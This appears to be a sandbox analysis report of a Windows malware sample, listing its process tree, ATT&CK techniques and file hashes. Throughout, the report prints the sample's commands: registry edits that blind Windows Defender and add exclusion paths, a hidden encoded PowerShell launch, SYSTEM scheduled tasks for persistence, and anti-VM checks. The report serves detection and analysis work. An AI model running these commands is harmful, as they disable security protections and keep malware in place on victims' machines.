C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DxTzxYfmrcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DxTzxYfmrcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HgpwBMHPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HgpwBMHPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YlnHzqqXEaDDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YlnHzqqXEaDDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mEGqyDDrClrU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mEGqyDDrClrU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nbVAllIPPGDxfqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nbVAllIPPGDxfqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVfXyuxDIVBpwENO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WVfXyuxDIVBpwENO\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HgpwBMHPU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HgpwBMHPU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YlnHzqqXEaDDC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YlnHzqqXEaDDC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mEGqyDDrClrU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mEGqyDDrClrU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nbVAllIPPGDxfqVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nbVAllIPPGDxfqVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVfXyuxDIVBpwENO /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WVfXyuxDIVBpwENO /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXRqRzChx" /SC once /ST 13:44:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXRqRzChx"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXRqRzChx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcuowESrCqkxPIacf" /SC once /ST 02:56:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WVfXyuxDIVBpwENO\JVQnjijFjvVJWlN\tLFOrJW.exe\" PU /hAMkdiduD 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcuowESrCqkxPIacf"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 9082⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5248 -s 35882⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\Temp\WVfXyuxDIVBpwENO\JVQnjijFjvVJWlN\tLFOrJW.exeC:\Windows\Temp\WVfXyuxDIVBpwENO\JVQnjijFjvVJWlN\tLFOrJW.exe PU /hAMkdiduD 525403 /S1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bxFWqzBdxtvvQVHpdf"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HgpwBMHPU\HYQTOE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UrAvajSMMGVpQVJ" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
4Virtualization/Sandbox Evasion
2Impair Defenses
1File and Directory Permissions Modification
1Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
2.0MB
MD5c4608debd2d6432c601bdabefa3d8b68
SHA13cb8e67237e23db4d3e554c71a78006b5524d689
SHA256ef23d4f3da39c2f9620292eabda602b6f0e359d522e990553d9cb95be3662925
SHA51290a07ccf3479264a7a9acafce70ce60600727b6cbde0a27d7999c9d5bef79d96395a86a49ccd82892661a68347924bbb7c6d335f92d9b4b58549a219a426f46b
-
C:\ProgramData\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\ProgramData\FHCBGIIJKEBF\GDHIDHFilesize
92KB
MD5f0764eecc2d52e7c433725edd7f6e17a
SHA12b6c1165e7ca5c433b29db548ac2624037c8cb38
SHA2566764736d2bd111036bea0eeb890cd75a5bb4114275abfffe615d9f79049f0ffc
